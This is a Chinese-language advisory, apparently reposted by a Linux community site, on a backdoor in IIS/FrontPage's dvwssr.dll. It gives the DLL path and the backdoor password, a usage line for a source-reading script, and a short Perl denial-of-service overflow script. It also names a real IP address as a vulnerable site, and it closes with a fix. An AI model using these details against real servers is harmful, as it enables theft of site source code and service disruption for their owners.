|
 |
栏目导栏 |
|
| |
|
|
|
|
|
资料搜索 |
|
| |
|
|
|
|
|
热门文章 |
|
| |
|
|
|
|
|
最新文章 |
|
| |
|
|
|
| |
| |
|
|
|
| |
| 过asp入侵web server,窃取文件毁坏系统-ASP漏洞集 |
|
描述 YGbLinux联盟
微软开发的两个动态库存在后门允许用户查看ASP文件源程序和下载整个网站详细随IIS和Frontpage Extention server而来的动态库程序,存在后门,允许用户远程读取 YGbLinux联盟
asp、asa和CGI程序的源代码。但这个动态库要求有密码,这个后门的密码是: "Netsc ape engineers are weenies!" YGbLinux联盟
程序路径为: /_vti_bin/_vti_aut/dvwssr.dll YGbLinux联盟
一般安装了 Frontpage98的 IIS服务器都有这个路径和文件。这个程序要求解码后才能发挥读取asp等源程序的功能,有趣的是,这个密码正是嘲弄其竞争对手Netscape YGbLinux联盟
的。 YGbLinux联盟
我们提供一个有该漏洞的国外网站给安全技术人员参考: YGbLinux联盟
http://62.236.90.195 YGbLinux联盟
其网站上有一个ASP程序 : http://62.236.90.195/cqsdoc/showcode.asp YGbLinux联盟
关于读取源程序,请下载这个测试程序,用法为: YGbLinux联盟
[john@Linux john]$ ./dvwssr1.pl 62.236.90.195 /cqsdoc/showcode.asp YGbLinux联盟
国内有很多网站都有这个漏洞,请管理员尽快更正! YGbLinux联盟
另外, dvwssr.dll还存在缓冲溢出,容易被DOS攻击,对于这个缓冲溢出的漏洞,可能能利用远程执行指令,但目前没有可用的exploit出来。 YGbLinux联盟
有一个DOS的脚本: YGbLinux联盟
#!/usr/bin/Perl YGbLinux联盟
print "GET /_vti_bin/_vti_aut/dvwssr.dll?"; YGbLinux联盟
print "a" x 5000; YGbLinux联盟
print " HTTP/1.1\nHost: yourhost\n\n"; YGbLinux联盟
另注:对该漏洞的说法,发现者、bugtraq和微软都有不同的版本微软不认为这是后门,但有咬文嚼字之嫌。 YGbLinux联盟
参见: YGbLinux联盟
http://www.microsoft.com/technet/security/bulletin/fq00-025.asp YGbLinux联盟
这个漏洞的实质是一个字符串,就是我们前面提到的 "Netscape engineers are weenies!" YGbLinux联盟
只要知道这个字符串,和了解相关的算法,就可以获得ASP等程序的源码。 YGbLinux联盟
我们已经做了大量测试,证实的确有效。 YGbLinux联盟
解决方案 YGbLinux联盟
删除 dvwssr.dll YGbLinux联盟
安装 Office 2000 Server Exten YGbLinux联盟
Linux联盟收集整理 ,转贴请标明原始链接,如有任何疑问欢迎来本站Linux论坛讨论 |
|
|
|
|
|
